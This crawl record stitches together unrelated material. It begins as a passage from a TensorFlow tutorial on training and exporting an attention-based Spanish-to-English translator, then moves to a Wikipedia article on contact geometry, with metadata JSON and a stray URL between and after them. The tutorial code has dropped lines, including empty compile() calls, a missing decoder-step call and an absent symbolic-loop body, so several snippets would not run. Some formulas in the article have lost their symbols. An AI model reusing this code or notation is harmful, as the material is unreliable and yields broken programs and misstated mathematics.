'enc_units')) self.shape_checker(enc_state, ('batch', 'enc_units')) # Initialize the decoder's state to the encoder's final state. # This only works if the encoder and decoder have the same number of # units. dec_state = enc_state loss = tf.constant(0.0) for t in tf.range(max_target_length-1): # Pass in two tokens from the target sequence: # 1. The current input to the decoder. # 2. The target the target for the decoder's next prediction. new_tokens = target_tokens[:, t:t+2] enc_output, dec_state) loss = loss + step_loss # Average the loss over all non padding tokens. average_loss = loss / tf.reduce_sum(tf.cast(target_mask, tf.float32)) # Apply an optimization step variables = self.trainable_variables # Return a dict mapping metric names to current value return {'batch_loss': average_loss} TrainTranslator._train_step = _train_step The _loop_step method, added below, executes the decoder and calculates the incremental loss and new decoder state (dec_state). def _loop_step(self, new_tokens, input_mask, enc_output, dec_state): input_token, target_token = new_tokens[:, 0:1], new_tokens[:, 1:2] # Run the decoder one step. decoder_input = DecoderInput(new_tokens=input_token, enc_output=enc_output, dec_result, dec_state = self.decoder(decoder_input, state=dec_state) self.shape_checker(dec_result.logits, ('batch', 't1', 'logits')) self.shape_checker(dec_result.attention_weights, ('batch', 't1', 's')) self.shape_checker(dec_state, ('batch', 'dec_units')) # self.loss returns the total for non-padded tokens y = target_token y_pred = dec_result.logits step_loss = self.loss(y, y_pred) return step_loss, dec_state TrainTranslator._loop_step = _loop_step ### Test the training step Build a TrainTranslator, and configure it for training using the Model.compile method: translator = TrainTranslator( embedding_dim, units, input_text_processor=input_text_processor, output_text_processor=output_text_processor, use_tf_function=False) # Configure the loss and optimizer translator.compile( ) Test out the train_step. For a text model like this the loss should start near: np.log(output_text_processor.vocabulary_size()) 8.517193191416238 %%time for n in range(10): print(translator.train_step([example_input_batch, example_target_batch])) print() {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=7.614782>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=7.5835567>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=7.5252647>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=7.361221>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=6.7776713>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=5.271942>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.822084>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.702935>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.303531>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.150844>} CPU times: user 5.21 s, sys: 0 ns, total: 5.21 s Wall time: 5.17 s While it's easier to debug without a tf.function it does give a performance boost. So now that the _train_step method is working, try the tf.function-wrapped _tf_train_step, to maximize performance while training: @tf.function(input_signature=[[tf.TensorSpec(dtype=tf.string, shape=[None]), tf.TensorSpec(dtype=tf.string, shape=[None])]]) def _tf_train_step(self, inputs): return self._train_step(inputs) TrainTranslator._tf_train_step = _tf_train_step translator.use_tf_function = True The first call will be slow, because it traces the function. translator.train_step([example_input_batch, example_target_batch]) 2021-08-31 11:08:27.919851: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] function_optimizer failed: Invalid argument: Input 6 of node gradient_tape/while/while_grad/body/_531/gradient_tape/while/gradients/while/decoder_1/gru_3/PartitionedCall_grad/PartitionedCall was passed variant from gradient_tape/while/while_grad/body/_531/gradient_tape/while/gradients/while/decoder_1/gru_3/PartitionedCall_grad/TensorListPopBack_2:1 incompatible with expected float. 2021-08-31 11:08:28.004195: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] shape_optimizer failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:28.044145: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] layout failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:28.227653: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] shape_optimizer failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:28.301920: W tensorflow/core/common_runtime/process_function_library_runtime.cc:841] Ignoring multi-device function optimization failure: Invalid argument: Input 1 of node while/body/_1/while/TensorListPushBack_56 was passed float from while/body/_1/while/decoder_1/gru_3/PartitionedCall:6 incompatible with expected variant. {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.0628138>} But after that it's usually 2-3x faster than the eager train_step method: %%time for n in range(10): print(translator.train_step([example_input_batch, example_target_batch])) print() {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.049926>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.0373826>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.9870682>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.885584>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.812589>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.7273908>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.6570778>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.6586785>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.598234>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.5944993>} CPU times: user 5.26 s, sys: 1.16 s, total: 6.42 s Wall time: 2.04 s A good test of a new model is to see that it can overfit a single batch of input. Try it, the loss should quickly go to zero: losses = [] for n in range(100): print('.', end='') logs = translator.train_step([example_input_batch, example_target_batch]) losses.append(logs['batch_loss'].numpy()) print() plt.plot(losses) .................................................................................................... [<matplotlib.lines.Line2D at 0x7fc2b90582d0>] Now that you're confident that the training step is working, build a fresh copy of the model to train from scratch: train_translator = TrainTranslator( embedding_dim, units, input_text_processor=input_text_processor, output_text_processor=output_text_processor) # Configure the loss and optimizer train_translator.compile( ) ### Train the model While there's nothing wrong with writing your own custom training loop, implementing the Model.train_step method, as in the previous section, allows you to run Model.fit and avoid rewriting all that boiler-plate code. This tutorial only trains for a couple of epochs, so use a callbacks.Callback to collect the history of batch losses, for plotting: class BatchLogs(tf.keras.callbacks.Callback): def __init__(self, key): self.key = key self.logs = [] def on_train_batch_end(self, n, logs): self.logs.append(logs[self.key]) batch_loss = BatchLogs('batch_loss') train_translator.fit(dataset, epochs=3, callbacks=[batch_loss]) Epoch 1/3 2021-08-31 11:08:55.515851: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] shape_optimizer failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:55.556380: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] layout failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:55.729119: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] shape_optimizer failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:55.802715: W tensorflow/core/common_runtime/process_function_library_runtime.cc:841] Ignoring multi-device function optimization failure: Invalid argument: Input 1 of node StatefulPartitionedCall/while/body/_59/while/TensorListPushBack_56 was passed float from StatefulPartitionedCall/while/body/_59/while/decoder_2/gru_5/PartitionedCall:6 incompatible with expected variant. 1859/1859 [==============================] - 353s 187ms/step - batch_loss: 2.0502 Epoch 2/3 1859/1859 [==============================] - 333s 179ms/step - batch_loss: 1.0388 Epoch 3/3 1859/1859 [==============================] - 323s 174ms/step - batch_loss: 0.8104 <keras.callbacks.History at 0x7fc2ccb315d0> plt.plot(batch_loss.logs) plt.ylim([0, 3]) plt.xlabel('Batch #') plt.ylabel('CE/token') Text(0, 0.5, 'CE/token') The visible jumps in the plot are at the epoch boundaries. ## Translate Now that the model is trained, implement a function to execute the full text => text translation. For this the model needs to invert the text => token IDs mapping provided by the output_text_processor. It also needs to know the IDs for special tokens. This is all implemented in the constructor for the new class. The implementation of the actual translate method will follow. Overall this is similar to the training loop, except that the input to the decoder at each time step is a sample from the decoder's last prediction. class Translator(tf.Module): def __init__(self, encoder, decoder, input_text_processor, output_text_processor): self.encoder = encoder self.decoder = decoder self.input_text_processor = input_text_processor self.output_text_processor = output_text_processor self.output_token_string_from_index = ( tf.keras.layers.experimental.preprocessing.StringLookup( vocabulary=output_text_processor.get_vocabulary(), invert=True)) # The output should never generate padding, unknown, or start. index_from_string = tf.keras.layers.experimental.preprocessing.StringLookup( self.start_token = index_from_string(tf.constant('[START]')) self.end_token = index_from_string(tf.constant('[END]')) translator = Translator( encoder=train_translator.encoder, decoder=train_translator.decoder, input_text_processor=input_text_processor, output_text_processor=output_text_processor, ) ### Convert token IDs to text The first method to implement is tokens_to_text which converts from token IDs to human readable text. def tokens_to_text(self, result_tokens): shape_checker = ShapeChecker() shape_checker(result_tokens, ('batch', 't')) result_text_tokens = self.output_token_string_from_index(result_tokens) shape_checker(result_text_tokens, ('batch', 't')) result_text = tf.strings.reduce_join(result_text_tokens, axis=1, separator=' ') shape_checker(result_text, ('batch')) result_text = tf.strings.strip(result_text) shape_checker(result_text, ('batch',)) return result_text Translator.tokens_to_text = tokens_to_text Input some random token IDs and see what it generates: example_output_tokens = tf.random.uniform( shape=[5, 2], minval=0, dtype=tf.int64, maxval=output_text_processor.vocabulary_size()) translator.tokens_to_text(example_output_tokens).numpy() array([b'divorce nodded', b'lid discovery', b'exhibition slam', b'unknown jackson', b'harmful excited'], dtype=object) ### Sample from the decoder's predictions This function takes the decoder's logit outputs and samples token IDs from that distribution: def sample(self, logits, temperature): shape_checker = ShapeChecker() # 't' is usually 1 here. shape_checker(logits, ('batch', 't', 'vocab')) # Set the logits for all masked tokens to -inf, so they are never chosen. if temperature == 0.0: new_tokens = tf.argmax(logits, axis=-1) else: logits = tf.squeeze(logits, axis=1) new_tokens = tf.random.categorical(logits/temperature, num_samples=1) shape_checker(new_tokens, ('batch', 't')) return new_tokens Translator.sample = sample Test run this function on some random inputs: example_logits = tf.random.normal([5, 1, output_text_processor.vocabulary_size()]) example_output_tokens = translator.sample(example_logits, temperature=1.0) example_output_tokens <tf.Tensor: shape=(5, 1), dtype=int64, numpy= array([[3310], [4574], [4746], [4916], [1352]])> ### Implement the translation loop Here is a complete implementation of the text to text translation loop. This implementation collects the results into python lists, before using tf.concat to join them into tensors. This implementation statically unrolls the graph out to max_length iterations. This is okay with eager execution in python. def translate_unrolled(self, input_text, *, max_length=50, return_attention=True, temperature=1.0): batch_size = tf.shape(input_text)[0] input_tokens = self.input_text_processor(input_text) enc_output, enc_state = self.encoder(input_tokens) dec_state = enc_state new_tokens = tf.fill([batch_size, 1], self.start_token) result_tokens = [] attention = [] done = tf.zeros([batch_size, 1], dtype=tf.bool) for _ in range(max_length): dec_input = DecoderInput(new_tokens=new_tokens, enc_output=enc_output, dec_result, dec_state = self.decoder(dec_input, state=dec_state) attention.append(dec_result.attention_weights) new_tokens = self.sample(dec_result.logits, temperature) # If a sequence produces an end_token, set it done done = done | (new_tokens == self.end_token) # Once a sequence is done it only produces 0-padding. new_tokens = tf.where(done, tf.constant(0, dtype=tf.int64), new_tokens) # Collect the generated tokens result_tokens.append(new_tokens) if tf.executing_eagerly() and tf.reduce_all(done): break # Convert the list of generates token ids to a list of strings. result_tokens = tf.concat(result_tokens, axis=-1) result_text = self.tokens_to_text(result_tokens) if return_attention: attention_stack = tf.concat(attention, axis=1) return {'text': result_text, 'attention': attention_stack} else: return {'text': result_text} Translator.translate = translate_unrolled Run it on a simple input: %%time input_text = tf.constant([ 'hace mucho frio aqui.', # "It's really cold here." 'Esta es mi vida.', # "This is my life."" ]) result = translator.translate( input_text = input_text) print(result['text'][0].numpy().decode()) print(result['text'][1].numpy().decode()) print() it is very cold here . heres my life . CPU times: user 143 ms, sys: 0 ns, total: 143 ms Wall time: 138 ms If you want to export this model you'll need to wrap this method in a tf.function. This basic implementation has a few issues if you try to do that: 1. The resulting graphs are very large and take a few seconds to build, save or load. 2. You can't break from a statically unrolled loop, so it will always run max_length iterations, even if all the outputs are done. But even then it's marginally faster than eager execution. @tf.function(input_signature=[tf.TensorSpec(dtype=tf.string, shape=[None])]) def tf_translate(self, input_text): return self.translate(input_text) Translator.tf_translate = tf_translate Run the tf.function once to compile it: %%time result = translator.tf_translate( input_text = input_text) CPU times: user 15.8 s, sys: 0 ns, total: 15.8 s Wall time: 15.7 s %%time result = translator.tf_translate( input_text = input_text) print(result['text'][0].numpy().decode()) print(result['text'][1].numpy().decode()) print() its awfully cold here . this is my life . CPU times: user 135 ms, sys: 0 ns, total: 135 ms Wall time: 67.9 ms ### [Optional] Use a symbolic loop Translator.translate = translate_symbolic The initial implementation used python lists to collect the outputs. This uses tf.range as the loop iterator, allowing tf.autograph to convert the loop. The biggest change in this implementation is the use of tf.TensorArray instead of python list to accumulate tensors. tf.TensorArray is required to collect a variable number of tensors in graph mode. With eager execution this implementation performs on par with the original: %%time result = translator.translate( input_text = input_text) print(result['text'][0].numpy().decode()) print(result['text'][1].numpy().decode()) print() it is very cold here . youre my life . CPU times: user 164 ms, sys: 0 ns, total: 164 ms Wall time: 157 ms But when you wrap it in a tf.function you'll notice two differences. @tf.function(input_signature=[tf.TensorSpec(dtype=tf.string, shape=[None])]) def tf_translate(self, input_text): return self.translate(input_text) Translator.tf_translate = tf_translate First: Graph creation is much faster (~10x), since it doesn't create max_iterations copies of the model. %%time result = translator.tf_translate( input_text = input_text) CPU times: user 1.77 s, sys: 0 ns, total: 1.77 s Wall time: 1.74 s Second: The compiled function is much faster on small inputs (5x on this example), because it can break out of the loop. %%time result = translator.tf_translate( input_text = input_text) print(result['text'][0].numpy().decode()) print(result['text'][1].numpy().decode()) print() its very cold here . this is my life . CPU times: user 38 ms, sys: 0 ns, total: 38 ms Wall time: 15.3 ms ### Visualize the process The attention weights returned by the translate method show where the model was "looking" when it generated each output token. So the sum of the attention over the input should return all ones: a = result['attention'][0] print(np.sum(a, axis=-1)) [1. 0.99999994 1. 0.99999994 1.0000001 0.99999994] Here is the attention distribution for the first output step of the first example. Note how the attention is now much more focused than it was for the untrained model: _ = plt.bar(range(len(a[0, :])), a[0, :]) Since there is some rough alignment between the input and output words, you expect the attention to be focused near the diagonal: plt.imshow(np.array(a), vmin=0.0) <matplotlib.image.AxesImage at 0x7fc2b9590050> Here is some code to make a better attention plot: ### Labeled attention plots i=0 plot_attention(result['attention'][i], input_text[i], result['text'][i]) /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:14: UserWarning: FixedFormatter should only be used together with FixedLocator /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:15: UserWarning: FixedFormatter should only be used together with FixedLocator from ipykernel import kernelapp as app Translate a few more sentences and plot them: %%time three_input_text = tf.constant([ # This is my life. 'Esta es mi vida.', # Are they still home? '¿Todavía están en casa?', # Try to find out.' 'Tratar de descubrir.', ]) result = translator.tf_translate(three_input_text) for tr in result['text']: print(tr.numpy().decode()) print() this is my life . are theyre home yet ? we tried to find out . CPU times: user 31.2 ms, sys: 61.3 ms, total: 92.5 ms Wall time: 21.3 ms result['text'] <tf.Tensor: shape=(3,), dtype=string, numpy= array([b'this is my life .', b'are theyre home yet ?', b'we tried to find out .'], dtype=object)> i = 0 plot_attention(result['attention'][i], three_input_text[i], result['text'][i]) /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:14: UserWarning: FixedFormatter should only be used together with FixedLocator /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:15: UserWarning: FixedFormatter should only be used together with FixedLocator from ipykernel import kernelapp as app i = 1 plot_attention(result['attention'][i], three_input_text[i], result['text'][i]) /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:14: UserWarning: FixedFormatter should only be used together with FixedLocator /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:15: UserWarning: FixedFormatter should only be used together with FixedLocator from ipykernel import kernelapp as app i = 2 plot_attention(result['attention'][i], three_input_text[i], result['text'][i]) /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:14: UserWarning: FixedFormatter should only be used together with FixedLocator /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:15: UserWarning: FixedFormatter should only be used together with FixedLocator from ipykernel import kernelapp as app The short sentences often work well, but if the input is too long the model literally loses focus and stops providing reasonable predictions. There are two main reasons for this: 1. The model was trained with teacher-forcing feeding the correct token at each step, regardless of the model's predictions. The model could be made more robust if it were sometimes fed its own predictions. 2. The model only has access to its previous output through the RNN state. If the RNN state gets corrupted, there's no way for the model to recover. Transformers solve this by using self-attention in the encoder and decoder. long_input_text = tf.constant([inp[-1]]) import textwrap print('Expected output:\n', '\n'.join(textwrap.wrap(targ[-1]))) Expected output: If you want to sound like a native speaker, you must be willing to practice saying the same sentence over and over in the same way that banjo players practice the same phrase over and over until they can play it correctly and at the desired tempo. result = translator.tf_translate(long_input_text) i = 0 plot_attention(result['attention'][i], long_input_text[i], result['text'][i]) _ = plt.suptitle('This never works') /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:14: UserWarning: FixedFormatter should only be used together with FixedLocator /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:15: UserWarning: FixedFormatter should only be used together with FixedLocator from ipykernel import kernelapp as app ## Export Once you have a model you're satisfied with you might want to export it as a tf.saved_model for use outside of this python program that created it. Since the model is a subclass of tf.Module (through keras.Model), and all the functionality for export is compiled in a tf.function the model should export cleanly with tf.saved_model.save: Now that the function has been traced it can be exported using saved_model.save: tf.saved_model.save(translator, 'translator', signatures={'serving_default': translator.tf_translate}) 2021-08-31 11:26:03.315521: W tensorflow/python/util/util.cc:348] Sets are not currently considered sequences, but this may change in the future, so consider avoiding using them. WARNING:absl:Found untraced functions such as encoder_2_layer_call_and_return_conditional_losses, encoder_2_layer_call_fn, decoder_2_layer_call_and_return_conditional_losses, decoder_2_layer_call_fn, embedding_4_layer_call_and_return_conditional_losses while saving (showing 5 of 60). These functions will not be directly callable after loading. INFO:tensorflow:Assets written to: translator/assets INFO:tensorflow:Assets written to: translator/assets reloaded = tf.saved_model.load('translator') %%time for tr in result['text']: print(tr.numpy().decode()) print() this is my life . are you still home ? try to figure out ahead . CPU times: user 43.6 ms, sys: 140 µs, total: 43.8 ms Wall time: 16.6 ms ## Next steps [{ "type": "thumb-down", "id": "missingTheInformationINeed", "label":"Missing the information I need" },{ "type": "thumb-down", "id": "tooComplicatedTooManySteps", "label":"Too complicated / too many steps" },{ "type": "thumb-down", "id": "outOfDate", "label":"Out of date" },{ "type": "thumb-down", "id": "samplesCodeIssue", "label":"Samples / code issue" },{ "type": "thumb-down", "id": "otherDown", "label":"Other" }] [{ "type": "thumb-up", "id": "easyToUnderstand", "label":"Easy to understand" },{ "type": "thumb-up", "id": "solvedMyProblem", "label":"Solved my problem" },{ "type": "thumb-up", "id": "otherUp", "label":"Other" }]
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.26789844036102295, "perplexity": 19564.3832327949}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057303.94/warc/CC-MAIN-20210922011746-20210922041746-00432.warc.gz"}
http://en.wikipedia.org/wiki/Contact_geometry
Contact geometry Contact form redirects here. For a web email form, see Form_(web)#Form-to-email_scripts. The standard contact structure on R3. Each point in R3 has a plane associated to it by the contact structure, in this case as the kernel of the one-form dzy dx. These planes appear to twist along the y-axis. In mathematics, contact geometry is the study of a geometric structure on smooth manifolds given by a hyperplane distribution in the tangent bundle and specified by a one-form, both of which satisfy a 'maximum non-degeneracy' condition called 'complete non-integrability'. From the Frobenius theorem, one recognizes the condition as the opposite of the condition that the distribution be determined by a codimension one foliation on the manifold ('complete integrability'). Contact geometry is in many ways an odd-dimensional counterpart of symplectic geometry, which belongs to the even-dimensional world. Both contact and symplectic geometry are motivated by the mathematical formalism of classical mechanics, where one can consider either the even-dimensional phase space of a mechanical system or the odd-dimensional extended phase space that includes the time variable. Applications Contact geometry has — as does symplectic geometry — broad applications in physics, e.g. geometrical optics, classical mechanics, thermodynamics, geometric quantization, and applied mathematics such as control theory. Contact geometry also has applications to low-dimensional topology; for example, it has been used by Kronheimer and Mrowka to prove the property P conjecture and by Yakov Eliashberg to derive a topological characterization of Stein manifolds. Contact forms and structures Given an n-dimensional smooth manifold M, and a point pM, a contact element of M with contact point p is an (n − 1)-dimensional linear subspace of the tangent space to M at p.[1][2] A contact element can be given by the zeros of a 1-form on the tangent space to M at p. However, if a contact element is given by the zeros of a 1-form ω, then it will also be given by the zeros of λω where λ ≠ 0. Thus, { λω : λ ≠ 0 } all give the same contact element. It follows that the space of all contact elements of M can be identified with a quotient of the cotangent bundle T*M,[1] namely: $\text{PT}^*M = \text{T}^*M /\! \sim \ \text{ where, for } \omega_i \in \text{T}^*_pM, \ \ \omega_1 \sim \omega_2 \ \iff \ \exists \ \lambda \neq 0 \ : \ \omega_1 = \lambda\omega_2.$ A contact structure on an odd dimensional manifold M, of dimension 2k+1, is a smooth distribution of contact elements, denoted by ξ, which is generic at each point.[1][2] The genericity condition is that ξ is non-integrable. Assume that we have a smooth distribution of contact elements, ξ, given locally by a differential 1-form α; i.e. a smooth section of the cotangent bundle. The non-integrability condition can be given explicitly as:[1] $\alpha \wedge (\text{d}\alpha)^k \neq 0 \ \text{where} \ (\text{d}\alpha)^k = \underbrace {\text{d}\alpha \wedge \ldots \wedge \text{d}\alpha}_{k-\text{times}}.$ Notice that if ξ is given by the differential 1-form α, then the same distribution is given locally by β = ƒ⋅α, where ƒ is a non-zero smooth function. If ξ is co-orientable then α is defined globally. Properties It follows from the Frobenius theorem on integrability that the contact field ξ is completely nonintegrable. This property of the contact field is roughly the opposite of being a field formed by the tangent planes to a family of nonoverlapping hypersurfaces in M. In particular, you cannot find a piece of a hypersurface tangent to ξ on an open set of M. More precisely, a maximally integrable subbundle has dimension n. Relation with symplectic structures A consequence of the definition is that the restriction of the 2-form ω = dα to a hyperplane in ξ is a nondegenerate 2-form. This construction provides any contact manifold M with a natural symplectic bundle of rank one smaller than the dimension of M. Note that a symplectic vector space is always even-dimensional, while contact manifolds need to be odd-dimensional. The cotangent bundle T*N of any n-dimensional manifold N is itself a manifold (of dimension 2n) and supports naturally an exact symplectic structure ω = dλ. (This 1-form λ is sometimes called the Liouville form). There are several ways to construct an associated contact manifold, one of dimension 2n − 1, one of dimension 2n + 1. Projectivization Let M be the projectivization of the cotangent bundle of N: thus M is fiber bundle over a M whose fiber at a point x is the space of lines in T*N, or, equivalently, the space of hyperplanes in TN. The 1-form λ does not descend to a genuine 1-form on M. However, it is homogeneous of degree 1, and so it defines a 1-form with values in the line bundle O(1), which is the dual of the fibrewise tautological line bundle of M. The kernel of this 1-form defines a contact distribution. Energy surfaces Suppose that H is a smooth function on T*N, that E is a regular value for H, so that the level set $L=\{(q,p)\in T^*N|H(q,p)=E\}$ is a smooth submanifold of codimension 1. A vector field Y is called an Euler (or Liouville) vector field if it is transverse to L and conformally symplectic, meaning that the Lie derivative of dλ with respect to Y is a multiple of dλ in a neighborhood of L. Then the restriction of $i_Yd\lambda$ to L is a contact form on L. This construction originates in Hamiltonian mechanics, where H is a Hamiltonian of a mechanical system with the configuration space N and the phase space T*N, and E is the value of the energy. The unit cotangent bundle Choose a Riemannian metric on the manifold N and let H be the associated kinetic energy. Then the level set H =1/2 is the unit cotangent bundle of N, a smooth manifold of dimension 2n-1 fibering over N with fibers being spheres. Then the Liouville form restricted to the unit cotangent bundle is a contact structure. This corresponds to a special case of the second construction, where the flow of the Euler vector field Y corresponds to linear scaling of momenta p's, leaving the q's fixed. The vector field R, defined by the equalities λ(R) = 1 and dλ(RA) = 0 for all vector fields A, is called the Reeb vector field, and it generates the geodesic flow of the Riemannian metric. More precisely, using the Riemannian metric, one can identify each point of the cotangent bundle of N with a point of the tangent bundle of N, and then the value of R at that point of the (unit) cotangent bundle is the corresponding (unit) vector parallel to N. First jet bundle On the other hand, one can build a contact manifold M of dimension 2n + 1 by considering the first jet bundle of the real valued functions on N. This bundle is isomorphic to T*N×R using the exterior derivative of a function. With coordinates (xt), M has a contact structure 1. α = dt + λ. Conversely, given any contact manifold M, the product M×R has a natural structure of a symplectic manifold. If α is a contact form on M, then ω = d(etα) is a symplectic form on M×R, where t denotes the variable in the R-direction. This new manifold is called the symplectization (sometimes symplectification in the literature) of the contact manifold M. Examples As a prime example, consider R3, endowed with coordinates (x,y,z) and the one-form dzy dx. The contact plane ξ at a point (x,y,z) is spanned by the vectors X1 = y and X2 = x + y z. By replacing the single variables x and y with the multivariables x1, ..., xn, y1, ..., yn, one can generalize this example to any R2n+1. By a theorem of Darboux, every contact structure on a manifold looks locally like this particular contact structure on the (2n + 1)-dimensional vector space. An important class of contact manifolds is formed by Sasakian manifolds. Legendrian submanifolds and knots The most interesting subspaces of a contact manifold are its Legendrian submanifolds. The non-integrability of the contact hyperplane field on a (2n + 1)-dimensional manifold means that no 2n-dimensional submanifold has it as its tangent bundle, even locally. However, it is in general possible to find n-dimensional (embedded or immersed) submanifolds whose tangent spaces lie inside the contact field. Legendrian submanifolds are analogous to Lagrangian submanifolds of symplectic manifolds. There is a precise relation: the lift of a Legendrian submanifold in a symplectization of a contact manifold is a Lagrangian submanifold. The simplest example of Legendrian submanifolds are Legendrian knots inside a contact three-manifold. Inequivalent Legendrian knots may be equivalent as smooth knots. Legendrian submanifolds are very rigid objects; typically there are infinitely many Legendrian isotopy classes of embeddings which are all smoothly isotopic. Symplectic field theory provides invariants of Legendrian submanifolds called relative contact homology that can sometimes distinguish distinct Legendrian submanifolds that are topologically identical. Reeb vector field If α is a contact form for a given contact structure, the Reeb vector field R can be defined as the unique element of the kernel of dα such that α(R) = 1. Its dynamics can be used to study the structure of the contact manifold or even the underlying manifold using techniques of Floer homology such as symplectic field theory and embedded contact homology. Some historical remarks The roots of contact geometry appear in work of Christiaan Huygens, Isaac Barrow and Isaac Newton. The theory of contact transformations (i.e. transformations preserving a contact structure) was developed by Sophus Lie, with the dual aims of studying differential equations (e.g. the Legendre transformation or canonical transformation) and describing the 'change of space element', familiar from projective duality. References 1. ^ a b c d Arnold, V. I. (1989), Mathematical Methods of Classical Mechanics, Springer, pp. 349 − 370, ISBN 0-387-96890-3 2. ^ a b Arnold, V. I. (1989). "Contact Geometry and Wave Propagation". Monographie de L'Enseignement Mathématique. Conférences de l'Union Mathématique Internationale (in English) (Univ. de Genève). Applications to differential equations • V. I. Arnold, Geometrical Methods In The Theory Of Ordinary Differential Equations, Springer-Verlag (1988), ISBN 0-387-96649-8 Contact three-manifolds and Legendrian knots • William Thurston, Three-Dimensional Geometry and Topology. Princeton University Press(1997), ISBN 0-691-08304-5 Information on the history of contact geometry • Lutz, R. Quelques remarques historiques et prospectives sur la géométrie de contact , Conf. on Diff. Geom. and Top. (Sardinia, 1988) Rend. Fac. Sci. Univ. Cagliari 58 (1988), suppl., 361–393. • Geiges, H. A Brief History of Contact Geometry and Topology, Expo. Math. 19 (2001), 25–53. • Arnold, V.I. (trans. E. Primrose), Huygens and Barrow, Newton and Hooke: pioneers in mathematical analysis and catastrophe theory from evolvents to quasicrystals. Birkhauser Verlag, 1990. • Contact geometry Theme on arxiv.org
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 4, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8535981774330139, "perplexity": 574.7860943089769}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-41/segments/1410657136494.66/warc/CC-MAIN-20140914011216-00182-ip-10-234-18-248.ec2.internal.warc.gz"}
https://cs.stackexchange.com/users/23949/alta%C3%AFr?tab=reputation
